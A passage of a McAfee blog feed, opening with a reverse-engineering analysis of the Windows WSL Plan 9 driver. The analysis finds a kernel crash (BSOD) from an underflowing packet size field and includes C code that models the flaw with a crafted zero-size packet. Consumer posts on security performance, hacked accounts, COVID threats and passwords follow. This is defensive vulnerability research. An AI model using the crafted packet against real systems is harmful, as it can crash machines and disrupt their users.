The data passed to the P9 driver is contained within a connection memory allocation of 0x10000 bytes (P9Client->P9PacketStart) and most of the processing is done within this memory allocation, with two exceptions where memmove is called within the P9Client::FillData and P9Client::Lambda_2275 functions (discussed below).

A message-type confusion attack is not possible since the P9Exchange data structure tracks the R-message to its corresponding T-message type.

In addition, the P9 driver uses a span reader to process message type fields of static length. The P9Exchange structure stores the message type which is used to determine the number of fields within a message during processing.

While we can control the P9 packet size we cannot control the P9Client->MaxConnectionSize which means messages greater than or equal to 0x10000 will be dropped.

All variable size field checks within the message type layer of the protocol are checked against the P9Packet size field ensuring that a malicious field will not result in out of bounds read or write access outside of the 0x10000 connection memory allocation.

The processing logic functions identified previously were reverse engineered to understand the validation on the protocol’s fields, with specific focus on the variable length fields within message types rversion, rwalk and rread.

By importing the P9Client and P9Exchange data structures into IDA Pro, the reverse engineering process was relatively straightforward and the packet validation logic easy to follow. The functions below have been reversed to the level required for understanding the validation and are not representative of the entire function code base.

P9Client::ReceiveCallback validates that the Rmessage_size does not exceed the max connection size of 0x10000.

void P9Client::ReceiveCallback(P9Client *P9Client){
    struct p9packet *P9Packet;
    uint64 MaxConnectionSize;
    uint64 Rmessage_size;
    MaxConnectionSize = P9Client->MaxConnectionSize;
    Rmessage_size = P9Client->Rmessage_size;
    if (MaxConnectionSize) {
        P9Packet = (struct p9packet *) P9Client->P9PacketStart;
        if (MaxConnectionSize < 0 || !P9Packet) terminate(P9Packet);
    }
    if (Rmessage_size >= 0 && P9Client->MaxConnectionSize >= Rmessage_size) {
        P9Client::HandleReply(*P9Client);
    } else {
        terminate(P9Packet);
    }
}

P9Client::HandleReply – there are multiple local DoS here which result in a Blue Screen Of Death (BSOD) depending on the size of P9Client->Rmessage_size and P9Client->P9PacketEnd->size, e.g. when P9Client->P9PacketEnd->size is zero, terminate() is called, which results in a BSOD.

void P9Client::HandleReply(P9Client *P9Client){
    uint64 P9PacketHeaderSize = 7;
    uint64 Rmessage_size = P9Client->Rmessage_size;
    if (Rmessage_size >= 7){
        while(1){
            P9PacketEnd = P9Client->P9PacketEnd;
            if(!P9PacketEnd) break;
            uint64 P9PacketSize = P9Client->P9PacketEnd->size;
            if (P9PacketSize > P9Client->MaxConnectionSize) HandleIoError();
            if (Rmessage_size < P9PacketSize) P9Client::FillData();
            if(Rmessage_size < 4) terminate(); // checking a P9 header size field exists in packet
            if(Rmessage_size < 5) fastfail();  // checking a P9 header type field exists in packet
            int message_type = P9PacketEnd->type;
            if(Rmessage_size < 7) fastfail();  // checking a P9 header tag field exists in packet
            uint64 tag = P9PacketEnd->tag;
            uint64 P9message_size = P9PacketSize - P9PacketHeaderSize; // getting size of message layer
            if (Rmessage_size - 7 < 0) terminate(); // checking message layer exists after P9 header
            if (Rmessage_size - 7 < P9message_size) terminate(); // BSOD here: when P9PacketSize = 0, subtracting 7 wraps around so P9message_size becomes greater than Rmessage_size
            P9Client::ProcessReply(P9Client, message_type, tag, &P9message_size);
        }
    }
    else {
        P9Client::FillData();
    }
}

P9Client::FillData – we cannot reach this function with a large Rmessage_size to force an out of bounds write.

int P9Client::FillData(P9Client *P9Client){
    uint64 Rmessage_size = P9Client->Rmessage_size;
    uint_ptr P9PacketEnd = P9Client->P9PacketEnd;
    uint_ptr P9PacketStart = P9Client->P9PacketStart;
    if (P9PacketEnd != P9PacketStart) {
        memmove(P9PacketStart, P9PacketEnd, Rmessage_size);
    }
}

ProcessReply checks the R-message type with that from the T-message within the P9Exchange data structure.

void P9Client::ProcessReply(P9Client *P9Client, Rmessage_type, tag, &P9message_size){
    P9Exchange *P9Exchange = MidExchangeManager::FindAndRemove(*P9Client, &P9Exchange);
    if (P9Packet->tag > 0) {
        int message_type_size = GetMessageSize(P9Exchange->Tmessage_type);
        int rmessage_type;
        if (P9message_size >= message_type_size) {
            rmessage_type = P9Exchange->Tmessage_type + 1; // R-message type is always T-message type + 1
        }
        if (rmessage_type > 72) {
            switch (P9Exchange->Tmessage_type) {
            case 100:
                P9Client::ProcessVersionReply(P9Client, P9Exchange, &P9message_size);
                break;
            case 110:
                P9Client::ProcessWalkReply(rmessage_type, P9Exchange, &P9message_size);
                break;
            }
        } else {
            P9Client::ProcessReadReply(rmessage_type, P9Exchange, &P9message_size);
        }
    }
}

During the P9Client::ProcessReply function it calls MidExchangeManager::FindAndRemove to fetch the P9Exchange data structure associated with the R-message’s corresponding T-message.

MidExchangeManager::FindAndRemove(*P9Client, &P9Exchange){
    NTSTATUS RxMapAndDissociateMidFromContext(PRX_MID_ATLAS P9Client->RDBSS_RxContext, USHORT Mid, &P9Exchange);
}

ProcessVersionReply checks the version sent by the client, “9P2000.L”, which is 8 characters, and checks for the same length on return, so rversionlen does not affect the tryString function.

void P9Client::ProcessVersionReply(*P9Client, *P9Exchange, &P9message_size) {
    char *rversion;
    int rversionlen = 0;
    rversion = P9Client->P9PacketStart.u.rversion->version->str;
    rversionlen = P9Client->P9PacketStart.u.rversion->version->len;
    tryString(messagesize, &rversion);
    strcmp(Tversion, Rversion);
}

ProcessWalkReply checks that the total size of the rwalk qid structures does not exceed the P9message_size.

void P9Client::ProcessWalkReply(rmessage_type, *P9Exchange, &P9message_size){
    uint16 nwqid = p9packet.rwalk.nwqid;
    uint64 rwalkpacket_size = P9message_size - 2; // 2 bytes of rwalk header for nwqid field
    uint_ptr rwalkpacketstart = &P9Client->P9PacketStart.u.rwalk->wqids;
    uint64 error_code = 0x0C0000186;
    uint64 rwalk_message_size = nwqid * 13; // 0xd is the size of one qid struct
    if (rwalk_message_size <= P9message_size) {
        P9Exchange->Lambda_8972(int, nwqid, &rwalk_message_size, P9Exchange->RxContext, &rwalkpacketstart); // Lambda_8972 is Lambda_PTR1 for rwalk message type
    } else {
        P9Exchange->P9Client::SyncContextErrorCallback(error_code, P9Exchange->RxContext); // SyncContextErrorCallback is Lambda_PTR2 for rwalk message type
    }
}

ProcessReadReply checks that the count field does not exceed 0x8000 and writes the data into an MDL within P9Exchange->RxContext to pass back up the RDBSS stack, so the file contents can be viewed within Explorer.

void P9Client::ProcessReadReply(rmessage_type, *P9Exchange, &P9message_size){
    uint64 count = P9Client->P9PacketStart.u.rread->count;
    P9Exchange->Lambda_2275(count, P9Exchange->RxContext, &P9message_size);
}

Lambda_2275(count, P9Exchange->RxContext, &P9message_size) {
    uint64 maxsize = P9Exchange->RxContext+offset; // max_size = 0x8000
    uint64 MDL = P9Exchange->RxContext+offset;
    if (count > maxsize) terminate();
    memmove(&MDL, P9Client->P9PacketStart.u.rread->data, count);
}
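To make the size-field underflow in HandleReply and the per-type bounds in ProcessWalkReply and ProcessReadReply concrete, here is an added user-mode C model of those checks. It is not code from p9rdr.sys or DIOD: p9_check_reply_vulnerable follows the reversed HandleReply order (an upper bound on the header size field but no lower bound, so unsigned subtraction wraps), and p9_check_reply_hardened is the same flow with the missing bounds added; all packets are constructed for the example.

```c
/* Added example, not code from p9rdr.sys or DIOD: a user-mode model of the
 * R-message validation reversed above, with constructed packets. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define P9_HEADER_SIZE      7u        /* size(4) + type(1) + tag(2) */
#define MAX_CONNECTION_SIZE 0x10000u  /* msize negotiated in Figure 1 */
#define P9_QID_SIZE         13u       /* one qid entry in an rwalk */
#define RREAD_MAX_COUNT     0x8000u   /* bound enforced in Lambda_2275 */
#define P9_RWALK            111
#define P9_RREAD            117

enum p9_verdict { P9_OK = 0, P9_INCOMPLETE = 1, P9_REJECT = 2, P9_CRASH = 3 };

struct p9_header { uint32_t size; uint8_t type; uint16_t tag; };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* Decode the 7-byte little-endian P9 header; returns 0 if too few bytes arrived. */
int p9_parse_header(const uint8_t *buf, size_t rmessage_size, struct p9_header *h)
{
    if (rmessage_size < P9_HEADER_SIZE) return 0;
    h->size = le32(buf);
    h->type = buf[4];
    h->tag  = le16(buf + 5);
    return 1;
}

/* Mirrors the reversed HandleReply: the size field is only bounded from above. */
enum p9_verdict p9_check_reply_vulnerable(const uint8_t *buf, size_t rmessage_size)
{
    struct p9_header h;
    if (!p9_parse_header(buf, rmessage_size, &h)) return P9_INCOMPLETE; /* FillData path */
    if (h.size > MAX_CONNECTION_SIZE) return P9_REJECT;                 /* HandleIoError */
    if (rmessage_size < h.size) return P9_INCOMPLETE;                  /* FillData path */
    /* No lower bound on h.size: any value below 7 wraps to a huge message size. */
    uint64_t p9message_size = (uint64_t)h.size - P9_HEADER_SIZE;
    if ((uint64_t)rmessage_size - P9_HEADER_SIZE < p9message_size)
        return P9_CRASH;                                                /* terminate() -> BSOD */
    return P9_OK;
}

/* Same flow with a lower bound on the header size, plus the variable-length
 * field checks described for rwalk (nwqid * 13) and rread (count <= 0x8000). */
enum p9_verdict p9_check_reply_hardened(const uint8_t *buf, size_t rmessage_size)
{
    struct p9_header h;
    if (!p9_parse_header(buf, rmessage_size, &h)) return P9_INCOMPLETE;
    if (h.size < P9_HEADER_SIZE || h.size > MAX_CONNECTION_SIZE) return P9_REJECT;
    if (rmessage_size < h.size) return P9_INCOMPLETE;
    uint32_t msg_size = h.size - P9_HEADER_SIZE;   /* cannot wrap any more */
    const uint8_t *msg = buf + P9_HEADER_SIZE;
    switch (h.type) {
    case P9_RWALK: {
        if (msg_size < 2) return P9_REJECT;
        uint32_t nwqid = le16(msg);
        if ((uint64_t)nwqid * P9_QID_SIZE > msg_size - 2) return P9_REJECT;
        return P9_OK;
    }
    case P9_RREAD: {
        if (msg_size < 4) return P9_REJECT;
        uint32_t count = le32(msg);
        if (count > RREAD_MAX_COUNT || count > msg_size - 4) return P9_REJECT;
        return P9_OK;
    }
    default:
        return P9_OK; /* other types: header-level checks only in this model */
    }
}

int main(void)
{
    /* Constructed RREAD reply whose header size field is zero, 7 bytes received. */
    const uint8_t zero_size[] = { 0x00, 0x00, 0x00, 0x00, P9_RREAD, 0x01, 0x00 };
    printf("zero size field: vulnerable=%d hardened=%d\n",
           p9_check_reply_vulnerable(zero_size, sizeof zero_size),
           p9_check_reply_hardened(zero_size, sizeof zero_size));
    return 0;
}
```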

Conclusion

Through this research, we discovered a local Denial of Service (DoS) within the Windows kernel implementation of the P9 protocol. As explained, the vulnerability cannot be exploited to gain code execution within the Windows kernel, so there is no risk to users from this specific vulnerability. As a pre-requisite to malicious P9 server attacks, an attacker must hijack the P9 server socket “fsserver”. Therefore, we can mitigate this attack by detecting and preventing hijacking of the socket “fsserver”. McAfee MVISION Endpoint and EDR provide detection and prevention coverage against P9 server socket “fsserver” hijacking, which you can read more about here.

We hope this research provides insights into the following:

  1. The vulnerability hunting process for new features such as the WSL P9 protocol on the Windows 10 OS
  2. Support for future research higher up the WSL communications stack, which increases in complexity due to the implementation of a virtual Linux file system on Windows
  3. The value of McAfee Advanced Threat Research (ATR) working closely with our product and innovation teams to provide protection for our customers

Finally, a special thanks to Leandro Costantino and Cedric Cochin for their initial Windows 10 WSL P9 server research.

The post Hunting for Blues – the WSL Plan 9 Protocol BSOD appeared first on McAfee Blogs.

Speed or Security? We Say Speed AND Security https://www.mcafee.com/blogs/consumer/security-software-and-device-performance/ https://www.mcafee.com/blogs/consumer/security-software-and-device-performance/#respond Thu, 23 Jul 2020 00:17:12 +0000 /blogs/?p=102855


“Security software slows down my PC.”

We often hear this sentiment when users talk about malware protection. While people recognize the value of computer security, most get frustrated if the software bogs down their device. I mean, I myself become frustrated when I’m trying to crunch numbers and I’m suddenly greeted with an hourglass!

While this may happen with some online safety products, McAfee’s security suites are as light as they get. We understand that while consumers need malware protection, it shouldn’t come at the price of device performance. So, we put our products to the test – AV-TEST and AV-Comparatives to be exact – to show users that they can stay secure without interrupting their digital lives with slow software.*

*AV-Test Results

*AV-Comparatives Results

Testing the Relationship Between Security and Speed

Modern tech users are multitaskers at heart. We need our devices to run all of our favorite programs efficiently, from email to photo editing apps to music streaming services. Security software is another program we need to run – one we’re worried will slow down the rest. So how can we be sure that our PC performance won’t be poorly impacted? Answer: measure it.

To measure how much impact malware protection has on PC performance, some independent test labs include performance impact benchmarks in their security product tests. The most well-known of these test labs are AV-TEST, which is based in Germany, and the Austria-based AV-Comparatives. These independent labs are among the most reputable and well-known anti-malware test labs in the world.

These organizations work by testing and evaluating a number of security products and the impact they have on PC performance. The AV-TEST lab evaluates the latest versions of various security products and measures the average impact of the product on computer speed. On the other hand, AV-Comparatives uses low-end computers and mimics users’ daily usage as much as possible, focusing on activities like copying files, installing and uninstalling applications, launching applications, downloading files, and browsing websites. Based on these tests’ results, products are graded in award levels ranging from ADVANCED+ (the highest ranking) to STANDARD (the lowest ranking).

So, how does McAfee stand up to the competition? Since May 2018, McAfee has consistently received the highest score in all performance tests. As a result, McAfee® Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020. Additionally, McAfee has achieved the ADVANCED+ ranking continuously since October 2016. In other words, McAfee Total Protection is one of the fastest and lightest products on the market. With results like these, I have to toot our own horn!

How Do These Results Impact Our Day-To-Day Lives?

During the WFH era, users are more reliant on devices than ever before. They need to work quickly and safely, without worrying about online threats. This matters especially because today’s malware comes in many forms, adapting to new technological advancements and the behaviors of the tech-savvy consumers who use them. In fact, hackers often pair their threats to whatever is present in consumers’ lives – so lately we’ve seen malware attacks emerge via COVID-related phishing emails or known device or app vulnerabilities.

What Else Helps with McAfee’s Performance Results?

McAfee Total Protection comes with PC Boost features, which benefit both productivity and entertainment by automatically giving more horsepower to apps you are actively working in and by pausing annoying auto-play videos in your browser. While these additions don’t specifically factor into the aforementioned test results, these automated tools help your computer run faster and more efficiently.

By leveraging a comprehensive solution like McAfee Total Protection, users can ultimately be more efficient with their time online, whether that’s crunching numbers, playing games, or running multiple apps at once. And let’s face it – when our devices make us feel empowered, our digital lives are better.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Speed or Security? We Say Speed AND Security appeared first on McAfee Blogs.

What to Do When Your Social Media Account Gets Hacked https://www.mcafee.com/blogs/consumer/consumer-threat-notices/social-media-account-hacked/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/social-media-account-hacked/#respond Wed, 22 Jul 2020 19:01:15 +0000 https://securingtomorrow.mcafee.com/?p=92869


You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account may have been hacked. What do you do? 

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22% of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. 

So, how should you respond if you find yourself in a social media predicament such as this? Your first move—and a crucial one—is to change your password right away and notify your connections that your account may have been compromised. This way, your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other hidden threats to having your social media account hacked. 

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts? 

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs. 

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites. 

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts. 

You may have already seen the scam for “discount sunglasses” that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page. 

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account. 

Now that you know what to do after a social media account is hacked, here’s how to prevent it from happening in the first place.

How to Keep Your Social Accounts Secure 

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know. 
  • Flag any scam posts or messages you encounter on social media to the respective platform, so they can help stop the threat from spreading. 
  • Use unique, complex passwords for all your accounts. Use a password generator to help you create strong passwords and a password manager can help store them.  
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available. 
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions. 
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen. 
  • Always use comprehensive security software that can keep you protected from the latest threats. 
  • Keep up-to-date on the latest scams and malware threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post What to Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

Staying Home? McAfee Report Shows Malware May Come Knocking https://www.mcafee.com/blogs/consumer/mcafee-report-reveals-covid-malware-insights/ https://www.mcafee.com/blogs/consumer/mcafee-report-reveals-covid-malware-insights/#respond Wed, 22 Jul 2020 04:30:56 +0000 /blogs/?p=102849


It’s no secret that COVID-19 continues to reshape the way we live our everyday lives. With each passing day, we become more reliant on our devices to stay connected with friends and family, move our professional work forward, participate in distance learning, or keep ourselves entertained.

Unfortunately, hackers are all too aware of these habits. In fact, findings from McAfee’s COVID-19 Threat Report: July 2020 have shown how criminals pair threats to whatever is present in consumers’ lives – specifically targeting pandemic-related industries, device habits, behaviors, and more with new malware strains.

A Day in the Life of Today’s Consumer

The day in the life of today’s consumer involves a lot of internet time.  

Back in March, users first transitioned from in-office to work from home to promote social distancing. As a result, they conduct their 9-to-5 from their personal living space. But with such a rushed transition, some of these workers aren’t trained on how the change impacts their online security and could be potentially working on unsecured Wi-Fi.  

Working professionals aren’t the only ones who have had to adapt to a new remote environment. Students have also made the transition to distance learning, moving from in-person course work to virtual classrooms. But as more students continue their curriculum from home and online activity increases, they become more reliant on digital platforms, such as video conferencing, that have now caught the eye of hackers.

When these professionals or students are done for the day, they then turn to some safe ways to unwind. To keep entertained, users have turned to online gaming, shopping, podcasts, social media, and TV streaming for fun – with the latter experiencing a 12% increase in viewing time in the third week of March alone.  

More Online Activity, More Opportunities for Cyberattacks

As it turns out, this increase in online activity has given hackers plenty of new avenues to exploit, almost all of which are pandemic-related. First and foremost, hackers have targeted attacks at those that feel the impacts of COVID-19 most directly, AKA the public sector. As McAfee research discovered, incidents during Q1 2020 increased within the public sector by 73%, individuals by 59%, education by 33%, and manufacturing by 44%.

Additionally, McAfee Labs saw an average of 375 new threats per minute and a surge of cybercriminal exploits through COVID-19 themed malicious apps, phishing campaigns, malware, and more during the first quarter of this year. Specifically, McAfee researchers discovered campaigns using pandemic-related subject lines, including testing, treatments, cures, and remote work topics. Criminals are using this sneaky tactic to lure targets into clicking on a malicious link, downloading a file, or viewing a PDF, resulting in the user’s device becoming infected with malware.

The Rise of Malware

Speaking of malware – according to the latest McAfee COVID-19 Threat Report, total malware increased by 27% over the past four quarters and new Mac OS malware samples increased by 51%. New mobile malware also increased by a whopping 71%, with total mobile malware increasing almost 12% over the past four quarters. As for IoT devices, new malware samples increased by nearly 58%, with total IoT malware growing 82% over the past few quarters.  

Mask Your Digital Life

During this time of uncertainty, it can be difficult to separate fact from fiction, to successfully identify a malicious scheme and stop it in its tracks. However, consumers can help protect their digital lives by following security best practices, now and in the future. Here’s what you can do to safeguard your security and remain worry-free.

Stay updated on the latest threats

To track malicious pandemic-related campaigns, McAfee Advanced Programs Group (APG) has published a COVID-19 Threat Dashboard, which includes top threats leveraging the pandemic, most targeted verticals and countries, and most utilized threat types and volume over time. The dashboard is updated daily at 4pm ET.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.   

Use a VPN

Avoid hackers infiltrating your network by using a VPN, which allows you to send and receive data while encrypting – or scrambling – your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from accessing other devices (work or personal) connected to your Wi-Fi.

Use a comprehensive security solution

Use a robust security software like McAfee® Total Protection, which helps to defend your entire family from the latest threats and malware while providing safe web browsing.  

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Staying Home? McAfee Report Shows Malware May Come Knocking appeared first on McAfee Blogs.

McAfee COVID-19 Report Reveals Pandemic Threat Evolution https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-19-report-reveals-pandemic-threat-evolution/ Wed, 22 Jul 2020 04:01:36 +0000


The McAfee Advanced Threat Research team today published the McAfee® Labs COVID-19 Threats Report, July 2020.

In this “Special Edition” threat report, we delve deep into the COVID-19-related attacks observed by our McAfee Advanced Threat Research and McAfee Labs teams in the first quarter of 2020 and the early months of the pandemic.

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world.

Thus far, the dominant themes of the 2020 threat landscape have been cybercriminals’ quick adaptation to exploit the pandemic and the considerable impact cyberattacks have had. For example, many ransomware attacks have escalated into data breaches as cybercriminals up the ante by leaking sensitive, often regulated, data, regardless of whether victims have paid the ransom.

Some of the other significant threat findings in our COVID-19 report include:

  • Average of 375 threats per minute in Q1 2020
  • Nearly 47% of all publicly disclosed security incidents took place in the United States
  • New PowerShell Malware increased drastically
  • Disclosed incidents largely targeted Public, Individual, and Education sectors

For the first time, we have also made available a COVID-19 dashboard to complement this threat report and extend its impact beyond the publication date. Timeliness is a challenge for any published threat report, but through the development of MVISION Insights our threat reports will include a link to a live dashboard tracking the world’s top threats. We will also make available the IoCs, YARA rules, and mapping to the MITRE ATT&CK framework as part of our continuing commitment to sharing our actionable intelligence. I hope these McAfee resources will be useful to you, the reader.

As we head into the second half of the year, we must consider how the threat landscape has changed when we address and define each attack. Simply assigning a technical descriptor or reverting to the same attack classifications fails to communicate the impact such campaigns have on the broader society.

All too often, we are called into investigations where businesses have been halted, or victims have lost considerable sums of money. While we all have had to contend with pandemic lockdown, criminals of all manner of capability have had a field day.

We hope you enjoy these new threat report approaches, and moreover we would appreciate you sharing these findings far and wide. These tools and insights could be the difference between a business remaining operational or having to shut its doors at a time when we have enough challenges to contend with.


The post McAfee COVID-19 Report Reveals Pandemic Threat Evolution appeared first on McAfee Blogs.

Strong Password Ideas to Keep Your Information Safe https://www.mcafee.com/blogs/consumer/strong-password-ideas-to-keep-your-information-safe/ Mon, 20 Jul 2020 15:31:27 +0000


Strong Password Ideas to Keep Your Information Safe

Password protection is one of the most common security protocols available. By creating a unique password, you are both proving your identity and keeping your personal information safer. However, when every account you have requires a separate password, it can be an overwhelming task. While you should be concerned about the safety of your data, you also want to avoid the frustration of forgetting your password and being blocked from the information you need. However, the benefits of using strong, unique passwords outweigh the occasional inconvenience.

Benefits of Strong Passwords

The main benefit of a strong password is security. Hackers work quickly when they are trying to access accounts. They want to steal as much information as they can in as short a time as possible. This makes an account with a strong password less inviting because cracking the code is much more involved.

A strong password also limits the damage that hackers can do to your personal accounts. A common strategy involves cracking the passwords of less secure sites with limited personal information. The hackers hope that they can use the password from your gym membership app to access information in your online banking account. Strong password protection prevents this situation.

Common Poor Password Practices

When someone is registering an online account, it can be tempting to blaze through the password process. In order to move quickly, there are several poor password practices that people employ.

  • Simple passwords: Password-cracking programs start by entering obvious combinations. These are passwords where the user puts no thought into the code such as “password” or “1234567”.
  • Repeated passwords: You may think you have such an unbreakable password that you want to use it for all of your accounts. However, this means that if hackers compromise one of your accounts, all of your other accounts are vulnerable.
  • Personal information: The number combinations that you are apt to remember easily are the ones that hackers can find. You may have put your birthday or graduation year on public display in a social media account. Your dog’s name may be unusual, but if you share information about your canine friend with the world, its name is a weak password.

The Meaning of a Strong Password

A password is considered strong when it is difficult for a hacker to crack it quickly. Sophisticated algorithms can run through many password combinations in a short time. A password that is long, complex and unique will discourage attempts to break into your accounts.

  • Long: The combinations that protect your accounts should be long enough that it would be difficult for a computer program to run through all the possible configurations. The four-digit PIN on a bank card has 10,000 possible combinations. This might take a human being some time to crack, but a computer program with unlimited tries could break it in a few seconds. If you were only using numbers, every additional character would multiply the possible combinations by 10. To stump the algorithms, you want a password that is a minimum of 12 characters long.
  • Complex: To increase the challenge of your password, it should have a combination of uppercase letters, lowercase letters, symbols and numbers. Hacking algorithms look for word and number patterns. By mixing the types of characters, you will break the pattern and keep your information safe.
  • Unique: If you have been reusing your passwords, it is time for you to start the work of changing them. Every one of your accounts should have its own password. At the very least, make certain that you have not reused passwords for your financial institutions, social media accounts and any work-related accounts.

Creating a Layered Password

If you want a password that is memorable but strong, you can easily turn a phrase into a layered, complex password. In this process, it is important to note that you should not use personal information that is available online as part of your phrase.

  • Pick a phrase that is memorable for you: It should not be a phrase you commonly use on social media accounts. If you are an avid runner you might choose a phrase like, “Running 26.2 Rocks!”
  • Replace letters with numbers and symbols: Remove the spaces. Then, you can put symbols and numbers in the place of some of the letters. Runn1ng26.2R0ck$!
  • Include a mix of letter cases: Finally, you want both lower and uppercase letters that are not in a clear pattern. Algorithms know how to look for common patterns like camelCase or PascalCase. Runn1NG26.2R0cK$!

Now, you have a password that you can remember while challenging the algorithms hackers use.
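As an added example (not McAfee’s code), here is a small checker that applies the long/complex/pattern criteria from the sections above to the three versions of the running phrase and estimates the search space a cracking program faces, in the spirit of the four-digit PIN arithmetic. The common-password list and the camelCase/PascalCase detection are simplified assumptions.

```python
"""Check a password against the post's criteria (long, complex, no obvious case
pattern, not a common password) and estimate the brute-force search space.
Added example, not McAfee code; the pattern and common-password checks are
deliberately simplified."""
import re
import string

MIN_LENGTH = 12  # the post's recommended minimum length

# Constructed list of obvious passwords; cracking programs try these first.
COMMON_PASSWORDS = {"password", "1234567", "123456", "111111", "qwerty", "abc123"}

# Alphabet size contributed by each character class, used for the keyspace estimate.
CLASS_SIZES = {
    "lower": len(string.ascii_lowercase),   # 26
    "upper": len(string.ascii_uppercase),   # 26
    "digit": len(string.digits),            # 10
    "symbol": len(string.punctuation),      # 32
}


def character_classes(password: str) -> set:
    """Return the set of classes (lower, upper, digit, symbol) the password uses."""
    classes = set()
    for ch in password:
        if ch in string.ascii_lowercase:
            classes.add("lower")
        elif ch in string.ascii_uppercase:
            classes.add("upper")
        elif ch in string.digits:
            classes.add("digit")
        elif ch in string.punctuation:
            classes.add("symbol")
    return classes


def keyspace(password: str) -> int:
    """Number of candidates a brute-force program must try for a password of this
    length drawn from the classes it uses. A four-digit PIN gives 10**4 = 10,000;
    each extra digit multiplies that by 10."""
    alphabet = sum(CLASS_SIZES[c] for c in character_classes(password))
    return alphabet ** len(password)


def follows_case_pattern(password: str) -> bool:
    """True when the letters (digits and symbols ignored) read as camelCase or
    PascalCase: every capital starts a run of lowercase letters."""
    letters = "".join(ch for ch in password if ch.isalpha())
    return re.fullmatch(r"[a-z]*(?:[A-Z][a-z]+)+", letters) is not None


def check_password(password: str) -> list:
    """Return the list of problems found; an empty list means the password
    meets the post's long/complex/unpredictable criteria."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    missing = set(CLASS_SIZES) - character_classes(password)
    if missing:
        problems.append("missing character classes: " + ", ".join(sorted(missing)))
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears on the common-password list")
    if follows_case_pattern(password):
        problems.append("letters follow a camelCase/PascalCase pattern")
    return problems


if __name__ == "__main__":
    # The three stages of the layered password from the post, plus a weak one.
    for candidate in ["1234567", "Runn1ng26.2R0ck$!", "Runn1NG26.2R0cK$!"]:
        print(f"{candidate!r}: keyspace={keyspace(candidate)}, "
              f"problems={check_password(candidate) or 'none'}")
```

The second stage of the phrase is still flagged because its capitals sit at word starts; the final stage, with its mixed case, passes all four checks.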

Employing a Password Manager

When you consider the number of accounts you need to protect, coming up with a properly layered password is a time-consuming task. Even if you are able to decide on a memorable phrase, there are just too many accounts that need passwords. A password manager is a helpful tool to keep you safe while you are online. It acts as a database for all of your passwords. Each time you create a new code, it stores it so that you can automatically enter it later. You only need to remember a single password to access the tools of your manager.

Most managers can also do the work of creating complex, layered passwords for your accounts. These will be a string of random numbers, letters and characters. They will not be memorable, but you are relying on the manager to do the memorizing. These machine-generated passwords are especially helpful for accounts you rarely access or that do not hold significant information.

Maintaining an Offline Password List

For critical accounts like your bank account or a work-related account, it can be helpful to keep an offline list of your passwords. Complex passwords are meant to be difficult to remember. You may recall the phrase but not all the detailed changes that make it layered. Keeping a document on a zip drive or even in a physical paper file or journal will allow you to access your information if your hardware fails or you are switching to a new system.

Keeping the Whole System Safe

Cracking passwords is just one of the strategies hackers use to steal information. In addition to using strong passwords, it is important to employ comprehensive security software. Strong passwords will help protect your online accounts. Strong overall security will keep your hardware and network safe from danger.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blogs.

Ways to Strengthen Your Family’s Digital and Mental Wellbeing https://www.mcafee.com/blogs/consumer/family-safety/ways-to-strengthen-your-familys-digital-and-mental-wellbeing/ Mon, 20 Jul 2020 05:56:30 +0000


There’s a lot that feels out of control right now. City and school re-openings are in limbo, and life for many still feels upended. But one thing we can control is our efforts to safeguard our family’s digital and mental health.

